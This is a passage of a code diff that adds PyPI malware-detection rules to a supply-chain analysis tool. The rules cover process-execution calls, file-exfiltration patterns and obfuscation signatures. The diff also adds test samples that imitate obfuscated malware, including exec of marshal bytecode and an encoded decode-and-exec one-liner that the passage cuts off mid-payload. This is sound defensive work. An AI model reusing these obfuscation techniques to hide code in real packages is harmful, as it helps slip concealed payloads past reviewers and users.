+ # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) + - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) + - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + # environment variables - pattern: os.environ - pattern: os.environ[...] @@ -84,6 +121,19 @@ rules: - pattern: winreg.QueryInfoKey(...) - pattern: winreg.QueryValue(...) - pattern: winreg.QueryValueEx(...) + - pattern: sqlite3.connect(...) + + # file exfiltration + - patterns: + - pattern: open($FILE, $MODE) + - metavariable-regex: + metavariable: $MODE + regex: r|rt|r+|w+|rb|r+b|w+b|a+|a+b + - patterns: + - pattern: os.open($FILE, $MODE) + - metavariable-regex: + metavariable: $MODE + regex: os\.O_RDONLY|os\.O_RDWR pattern-sinks: - pattern-either: diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index 5f3bf329c..76b327578 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -67,31 +67,26 @@ rules: - pattern: __import__('__pyarmor__') # pyarmor RTF mode: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html - pattern: __assert_armored__($PAYLOAD) - - patterns: - - pattern: | - def $FUNC_NAME(...): - ... 
- - metavariable-regex: - metavariable: $FUNC_NAME - regex: ^pyarmor__\d+$ # inline pyarmor marker: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html - - pattern-regex: ^# pyarmor:.? + - pattern-regex: ^\s*#\s*pyarmor:.* # obfuscated names using pyob.oxyry.com with O, o, 0 or github.com/QQuick/Opy and pyobfuscate using l, I, 1 - patterns: - - pattern: | - def $OBF(...): - ... - - pattern: | - class $OBF(...): - ... - - pattern: $OBF = ... + - pattern-either: + - pattern: | + def $OBF(...): + ... + - pattern: | + class $OBF(...): + ... + - pattern: $OBF = ... - metavariable-regex: metavariable: $OBF - regex: (^_?[Oo0]|[1Il]+$) + regex: (^_*([lI1_]{5,}|[Oo0_]{5,})_*$)|(^pyarmor_*\d+$) # obfuscated using pyobfuscate.com - pattern: pyobfuscate=... # obfuscated using liftoff.github.io/pyminifier - pattern: import mystificate + - pattern: import demiurgic - id: inline-imports metadata: @@ -134,9 +129,10 @@ rules: - pattern: bytes.fromhex(...) # unicode construction - patterns: - - pattern: $STRING.join(map($FOO, [...])) - - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) - - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) + - pattern-either: + - pattern: $STRING.join(map($FOO, [...])) + - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) + - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) - metavariable-regex: metavariable: $FOO regex: unicode|unichr|chr|ord diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index b7d54e72a..9c99b8062 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -116,7 +116,7 @@ def analyze_source(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heuri logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) try: sourcecode_analyzer = PyPISourcecodeAnalyzer() - return 
sourcecode_analyzer.analyze_patterns(pypi_package_json) + return sourcecode_analyzer.analyze(pypi_package_json) except (ConfigurationError, HeuristicAnalyzerValueError) as source_code_error: logger.debug("Unable to perform source code analysis: %s", source_code_error) return HeuristicResult.SKIP, {} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py new file mode 100644 index 000000000..74ce85c19 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py @@ -0,0 +1,26 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. 
+ """ + sys.exit() + # marshal encryption from pyobfuscate.com/marshal-encrypt, script is just print("Hello world!") + + from marshal import loads + bytecode = loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00') + exec(bytecode) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py new file mode 100644 index 000000000..ed2c9dda9 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py @@ -0,0 +1,61 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. 
+ """ + sys.exit() + import builtins + _ = __import__ + _ = getattr + _ = bytes + _ = bytearray + _ = exec + _ = eval + _ = setattr + _ = compile + _ = map + _ = open + _ = zip + _ = vars + _ = dir + _ = builtins.__import__ + _ = builtins.getattr + _ = builtins.bytes + _ = builtins.bytearray + _ = builtins.exec + _ = builtins.eval + _ = builtins.setattr + _ = builtins.compile + _ = builtins.map + _ = builtins.open + _ = builtins.zip + _ = builtins.vars + _ = builtins.dir + _ = __import__('builtins').__import__ + _ = __import__('builtins').getattr + _ = __import__('builtins').bytes + _ = __import__('builtins').bytearray + _ = __import__('builtins').exec + _ = __import__('builtins').eval + _ = __import__('builtins').setattr + _ = __import__('builtins').compile + _ = __import__('builtins').builtins.map + _ = __import__('builtins').open + _ = __import__('builtins').zip + _ = __import__('builtins').vars + _ = __import__('builtins').dir diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json new file mode 100644 index 000000000..3376aa3ed --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -0,0 +1,405 @@ +{ + "src.macaron.resources.pypi_malware_rules.decode-and-execute": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 26, + "end": 26 + } + ], + "src.macaron.resources.pypi_malware_rules.default-assigning": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 23, + "end": 23 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 24, + "end": 24 + }, + { + "file": 
"/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 25, + "end": 25 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 26, + "end": 26 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 27, + "end": 27 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 28, + "end": 28 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 29, + "end": 29 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 30, + "end": 30 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 31, + "end": 31 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 32, + "end": 32 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 33, + "end": 33 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 34, + "end": 34 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 35, + "end": 35 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 36, + "end": 36 + 
}, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 37, + "end": 37 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 38, + "end": 38 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 39, + "end": 39 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 40, + "end": 40 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 41, + "end": 41 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 42, + "end": 42 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 43, + "end": 43 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 44, + "end": 44 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 45, + "end": 45 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 46, + "end": 46 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 47, + "end": 47 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 
48, + "end": 48 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 49, + "end": 49 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 50, + "end": 50 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 51, + "end": 51 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 52, + "end": 52 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 53, + "end": 53 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 54, + "end": 54 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 55, + "end": 55 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 56, + "end": 56 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 57, + "end": 57 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 58, + "end": 58 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 59, + "end": 59 + }, + { + "file": 
"/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 60, + "end": 60 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 61, + "end": 61 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 68, + "end": 68 + } + ], + "src.macaron.resources.pypi_malware_rules.inline-imports": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 49, + "end": 49 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 50, + "end": 50 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 51, + "end": 51 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 52, + "end": 52 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 53, + "end": 53 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 54, + "end": 54 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 55, + "end": 55 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 56, + "end": 56 + }, + { + "file": 
"/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 57, + "end": 57 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 58, + "end": 58 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 59, + "end": 59 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 60, + "end": 60 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 61, + "end": 61 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 69, + "end": 69 + } + ], + "src.macaron.resources.pypi_malware_rules.obfuscation-tools": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 23, + "end": 23 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 25, + "end": 31 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 26, + "end": 26 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 27, + "end": 27 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 28, + "end": 28 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 30, + "end": 31 + }, + { + 
"file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 33, + "end": 33 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 37, + "end": 37 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 39, + "end": 45 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 40, + "end": 40 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 41, + "end": 41 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 42, + "end": 42 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 44, + "end": 45 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 47, + "end": 47 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 51, + "end": 51 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 53, + "end": 59 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 54, + "end": 54 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 55, + "end": 55 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + 
"start": 56, + "end": 56 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 58, + "end": 59 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 61, + "end": 61 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 65, + "end": 65 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 68, + "end": 68 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 68, + "end": 68 + } + ] +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py new file mode 100644 index 000000000..270f88600 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py @@ -0,0 +1,69 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + # using pyobfuscate.com/rename-obf to rename items, code is a class that has one method that prints Hello world! 
+ lllllllllllllll, llllllllllllllI = __name__, print + + class lIIlIIIIIIIlIlllIl: + IIlIllIIlllIlIlIll = 'Hello' + IlIIlIIIlIllIIlIIl = 'world' + IIlIlIlIIIIlIIlIlI = '!' + + def IIlIlIIIIlIlIlIIll(IIIlIlIIllllIlIlll): + llllllllllllllI(f'{IIIlIlIIllllIlIlll.IIlIllIIlllIlIlIll} {IIIlIlIIllllIlIlll.IlIIlIIIlIllIIlIIl}{IIIlIlIIllllIlIlll.IIlIlIlIIIIlIIlIlI}') + if lllllllllllllll == '__main__': + llIlIIIllIIIIlIlll = lIIlIIIIIIIlIlllIl() + llIlIIIllIIIIlIlll.IIlIlIIIIlIlIlIIll() + + # using pyob.oxyry.com's naming convention + __O0O00O00O0OOOOO0O, __OO00000OOOO000OO0 = __name__, print + + class OO0OO0OOO0OOOO000: + OO000OOOOO00O0OOO = 'Hello' + OOO0O00O00000O0O0 = 'world' + OOOOO0O000O0O000O = '!' + + def OOOOOO000OOO0O0O0(O00O00O0O00O000O0): + __OO00000OOOO000OO0(f'{O00O00O0O00O000O0.OO000OOOOO00O0OOO} {O00O00O0O00O000O0.OOO0O00O00000O0O0}{O00O00O0O00O000O0.OOOOO0O000O0O000O}') + if __O0O00O00O0OOOOO0O == '__main__': + __OO00000O00OOOO0OO = OO0OO0OOO0OOOO000() + __OO00000O00OOOO0OO.OOOOOO000OOO0O0O0() + + # using pyarmor's RTF mode naming convention + pyarmor__12, pyarmor__14 = __name__, print + + class pyarmor__16: + pyarmor__18 = 'Hello' + pyarmor__0 = 'world' + pyarmor__8 = '!' 
+ + def pyarmor__24(pyarmor__60): + pyarmor__14(f'{pyarmor__60.pyarmor__18} {pyarmor__60.pyarmor__0}{pyarmor__60.pyarmor__8}') + if pyarmor__12 == '__main__': + pyarmor__2 = pyarmor__16() + pyarmor__2.pyarmor__24() + + # inline pyarmor marker + # pyarmor: print('this script is obfuscated') + + # obfuscated using pyobfuscate.com/pyd's AES 256-bit encryption + pyobfuscate=(lambda getattr:[((lambda IIlII,IlIIl:setattr(__builtins__,IIlII,IlIIl))(IIlII,IlIIl)) for IIlII,IlIIl in getattr.items()]);Il=chr(114)+chr(101);lI=r'[^a-zA-Z0-9]';lIl=chr(115)+chr(117)+chr(98);lllllllllllllll, llllllllllllllI, lllllllllllllIl,lllllllllIIllIIlI = __import__, getattr, bytes,exec + __import__("sys").setrecursionlimit(100000000);lllllllllIIllIIlI(llllllllllllllI(lllllllllllllll(lllllllllllllIl.fromhex('7a6c6962').decode()), lllllllllllllIl.fromhex('6465636f6d7072657373').decode())(lllllllllllllIl.fromhex('789ced1ded6edb38f2557cbf22b559c1f737455e615f20300437717b069cb8485cec2e0ef7ee2759964491f3c90f597224140b9543cef70c6748b95b96f5f378d8be7e7fd9aeca87d33fbf76d99732ff56aecbc78fd3fbb7f2f23cbeec9f4fd5683775fd50ae8bb27c3ebeeccab2783e96dbf79fcfc7df6fa7f392c73f8f6fbbea6dfd58ae1b1c8f0d9eeca9c29ce5f7d59f167556c1d65983f7a15a5243fa918a52f5f79ada79c500500fe69b8ad9f2f169736195a2033fa648e7a7306617c822674276561db928cbeba752efba67ca62c2e400a67759e960e86d58affeb9eb665a04feb3fbfb1e18ae6c7d6f68a25179cf8b561bcc70d928e3a9056ebe7ae2ef703d652dfccb97f6ed6bb7240f2090197caa191d7006b15671e6ab5b9bb50e79ee25ec10599e354ee07a6af300feaa8e1867fec0271eda974eae40233276c89b5411413015d9388ec9a2e9c32383228566323767d253c1e8cbfd3c522fe5a89660fc772ccb926c991c6db0582eeddde36dfbdaef1f6d40fc381cb72710433be3e7e1f87d7bf870e7b413f6a7dd3bca439c6dd8021ad2fb99231c438b854d3fc364dbeaec690369ccdea9d78f55ddb38675db627a3ebefe3af4bbffd0e4cf87edc7c7d9e67d02fcb13f746ed08efef77ff736de5fc7bfee873c3dfcdc9db6a7d33b659baccab74f04bc99044ec80671e66d9750349874839853236dcbbcd8bc4517364c4c185df20cdd533bd3eb6a8ca924ff44ae5de510a7921bc6ffcbfeddee18cc59565fd2
da6988b39d7b7c7fb9a71004158a4d13756efabc115ac054dd43a4d225298f00aff556a443953d6d545e9b653e55a4b85cedc73c0acfe00ddf4010905ece1a0d4c87bdc3085eaea0a98858b498e279a0bc89d23be320aed2679036a7b6676818a58caedbcc53b7c218cd2e141261778be27eceb241c4de20ec72823fbf6cb08c76fa103d18977c776bf94e7166e6229abb6e3a708a236d1feee225c31ad31f1d78035c7798874c59776e32c9d41b642b1c57b08dae6d645141c3edfbf076e40ea5e93de43919cc210af472e1f4fb2b91dfa0dd0fe0ba2ade18b2c16503c12c5660286f37e4b21a2b914b5c23374108dcf2d7a6dcc910a837777158dd14eb56246ceb362b1c7d5994e7c0317dbda1640643598e74d836c717dfb79224e638eb0e47a58cfd0f22bd3199af6eb2d61bc291ea63b6dde163677077666b9d886c470f02d5c01fc7f7b302f66f75f3919b370e5cd3c1160b0f46b510ff50c5f00977b139c3f856a5bffe299b3c70ae51065aa995d168a5b9a8af15d3b17ef6963cdf40df74148d104543d272caccf0315349608aab8611a7a7531f84ed2c7cd7554eae9dece619e12f6612e0b1c7276d2e908dd6b98ee3b8e968d0740d813d3e56b248b92fcc8e0cdf55f8b943fba22808e07b0d963a8094f345bd079a7b31f2c10acd1d5662912a91577ec3fb628eab0e5782161bff1081e38ad395108c38577d0c9aec1034ddf9eae3652caf37f084fcdb4f5a79c86c12ebb4519979049c091923f3879d490484bba521d9449d88635a0a103e4641e0a1b9880d89f169d7f5124bd8698a3eb12b542ededb0066f9649762bf10947d91e48f9f9c1869838c91bb5f31a6bb4fe424ed188c5d3c71843df21dad58a7a8948b0e08c416bdfa3531a350dc86c99aafa4bbf5c5e327e0e3ce8b321b246d8a74fe116fe7153a008d589c30f515c1d56ae7160cb5fec12d6fc43a35042cda84476ebbc58a715fc2ba5acf5d83c87983275d599b62b3c53a8564dd8cead39708a9d20547a8e9e36da481d93376334c6aab5bdbbafd355d9de4cfa78232a40bed92c33dcc233b46389c8f2e7460ef40a25166e694c78063ec65fefb7a4f2aec0aca5dece9a9aeec4adff1898ea8d54bac33b4de49af7a18d6c1639d09191286e5b274d5accb3551080579b9e025fd711576206c97af57dcd23bee8917d63126d7e13a1de10855751093ba3dc57d11745f89cbbba1575ff152ae9b203e4c135e4b8ce74a148fe4a5479ae336774d408f1fa7750cb8f6080c54f89f4998d0415ae86d162fcdf0f7bdd1bba69e57a53dbd0aec906fbcd2b520ad9fcda142f5edf6253c744812ddce881928553575ea8226ecaa5d73a5dbe7bb6bba62c7a4e645549886e849b427a708338f1d3bced6a966355483e0763b
c5db4e9fb649204bacab2aed098a4b3566de1dedf4cc7f73d7ab0af4d5ebb96afab396511d324eea897cbc19a28098a72a486c26687426518f462d0113da3d6e4e0c3d115688ea187fb2f7386a170fb6b977b773c5eec1f74220fcdc3530a84d47bcfe114bb22633c6cdcb68ff6496f6a346da4d94aa8cd9faf67ab0f2dde4be919717bceee2d0ebe20e4fd4afeac38af44437d2f8575971afd1340df0668493c0321dfa712e85da9fed151740f3dfafdddfcda74021672001c2715ea0b70074408cbe4020ae460782a337392194afa0c54150b5c0f361d695540124d61033a3b0a0f6df07b3796a281663ba0b221d4aeb3d2acd721251e62078ee40851b0dc600171c61b1414ac9d181514ecdb7009935c9a9a4b332cc00c2a8d0818924818f1b1a45782d7a8773c881fe86e862305799300937c391396cd0080b4b1a96c72105c239006a85b354ca2a91e630230bb91aaa9f94873437c60b665e3a91810b7bf258ead56c8ba486344e8213004d66a37627b94b6da2b83b78953300c8e552538ab48b2016c9fc2ee1159509cf78ea3d51babd312a77025e610b63d0cda45205b8590411570b506a8ddcf8a9bc8b8258a589799339ea27f03ab555b59afbb47e0c5b5cd3c675624853b6af401c046242ca326137dec524ce230e2c5554201cd8eb901211a218da0542a0ae301304180a7415684de3538f5d1be1b3157641b55798a491ac07d45ceaadc72e93f5540dcc1c75649ccd17d59ff4dfc7253fdd64c2ec4680449e411049f72f18a2c878f82252589c840630857ce362e1e5472d042f91548710b5a1f023d509ca3cc5381f69239cb2b30ccd3bb8290004c272545e6b24109d630ede16780713217297f031e9d57e58831aebb876651792de73b56681095d4a5f62b640fb83c171e30eb7f4bbacc45efd2e44455cbbceb56ca5d04daef8bcb5b29550fe721f3f84ba296c18843203c019bdf4dad6fcea51a16659ed68c4a0b9e280d73f6a83add64fb5087ae150734a7160af1b8847535c8ed84a4d40077a168d786e85a13528090b1850481682becc00d29771da28c1e6cb8d898d7d02875b3a1156629f4e04a3ae3